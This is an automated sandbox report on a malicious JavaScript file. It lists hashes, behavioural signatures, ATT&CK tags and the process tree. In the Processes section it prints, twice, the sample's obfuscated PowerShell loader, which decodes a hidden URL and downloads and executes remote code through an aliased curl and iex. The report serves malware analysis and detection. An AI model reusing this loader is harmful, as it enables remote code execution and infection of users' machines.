Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-12-2024 15:10
Static task
static1
Behavioral task
behavioral1
Sample
16bf57f45f0a05f0aff93dfe37d7c6998bee82e60e00c644e28f6d04f239bda4.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
16bf57f45f0a05f0aff93dfe37d7c6998bee82e60e00c644e28f6d04f239bda4.js
Resource
win10v2004-20241007-en
General
-
Target
16bf57f45f0a05f0aff93dfe37d7c6998bee82e60e00c644e28f6d04f239bda4.js
-
Size
198KB
-
MD5
812d33d3639081862f70e134d7b8669b
-
SHA1
40d2444c622c6b143f354e1e87b196ee369c975a
-
SHA256
16bf57f45f0a05f0aff93dfe37d7c6998bee82e60e00c644e28f6d04f239bda4
-
SHA512
fe5835ed046fed240f22747e7f8c069f052b7de5f9230c665af4c85088259720c8df77f73becee61a5a427d412ea8035c136758f117edf9eb7b0b97c866e0644
-
SSDEEP
3072:nvM6wb+7OOelgQoKOO0lgQoflgQoKOOSOOn:3ONlgaOplgvlgaO3O6
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2036 4188 conhost.exe 84 -
Blocklisted process makes network request 1 IoCs
flow pid Process 8 2872 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2872 powershell.exe 2872 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2872 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 2036 wrote to memory of 2872 2036 conhost.exe 86 PID 2036 wrote to memory of 2872 2036 conhost.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\16bf57f45f0a05f0aff93dfe37d7c6998bee82e60e00c644e28f6d04f239bda4.js1⤵PID:548
-
C:\Windows\system32\conhost.execonhost --headless powershell $sgucidaz='ur' ;new-alias printout c$($sgucidaz)l;$hkpunoceribalj=(4273,4284,4292,4276,4278,4273,4293,4292,4297,4230,4292,4226,4273,4221,4291,4286,4287,4222,4224,4221,4287,4279,4287,4238,4290,4236,4284,4280,4285,4291,4290,4225,4224);$qkodfthvxb=('bronx','get-cmdlet');$cjmdvgyoix=$hkpunoceribalj;foreach($suaxpbjocrg in $cjmdvgyoix){$erylfhp=$suaxpbjocrg;$sneiyj=$sneiyj+[char]($erylfhp-4175);$kgqovtfhemuz=$sneiyj; $ajbuvlpy=$kgqovtfhemuz};$sxozalgneuqyjp[2]=$ajbuvlpy;$rphjvl='rl';$nirusaqbxz=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ajbuvlpy)1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $sgucidaz='ur' ;new-alias printout c$($sgucidaz)l;$hkpunoceribalj=(4273,4284,4292,4276,4278,4273,4293,4292,4297,4230,4292,4226,4273,4221,4291,4286,4287,4222,4224,4221,4287,4279,4287,4238,4290,4236,4284,4280,4285,4291,4290,4225,4224);$qkodfthvxb=('bronx','get-cmdlet');$cjmdvgyoix=$hkpunoceribalj;foreach($suaxpbjocrg in $cjmdvgyoix){$erylfhp=$suaxpbjocrg;$sneiyj=$sneiyj+[char]($erylfhp-4175);$kgqovtfhemuz=$sneiyj; $ajbuvlpy=$kgqovtfhemuz};$sxozalgneuqyjp[2]=$ajbuvlpy;$rphjvl='rl';$nirusaqbxz=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ajbuvlpy)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82